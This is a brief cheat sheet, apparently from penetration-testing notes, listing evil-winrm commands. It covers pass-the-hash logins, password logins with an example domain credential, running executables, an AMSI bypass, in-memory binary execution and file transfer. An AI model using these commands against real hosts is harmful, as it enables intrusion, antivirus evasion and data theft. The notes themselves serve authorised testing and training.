Evil-Winrm
evil-winrm -i $ip -u $UserName -H <HASH>
evil-winrm -i $files -u 'doamin\username' -p 'password'
# example:
# evil-winrm -i $files -u 'relia.com\username' -p 'vau!XCKjNQBv2$'Run Executables File
evil-winrm -i $ip -u $UserName -p $PassWord -e $directory_location
Bypass-4MSI
menu
Invoke-Binary complete_location_of_Binary_on_kaliUpload or donwload file.
upload $Source $Detination
Download $Source $DetinationLast updated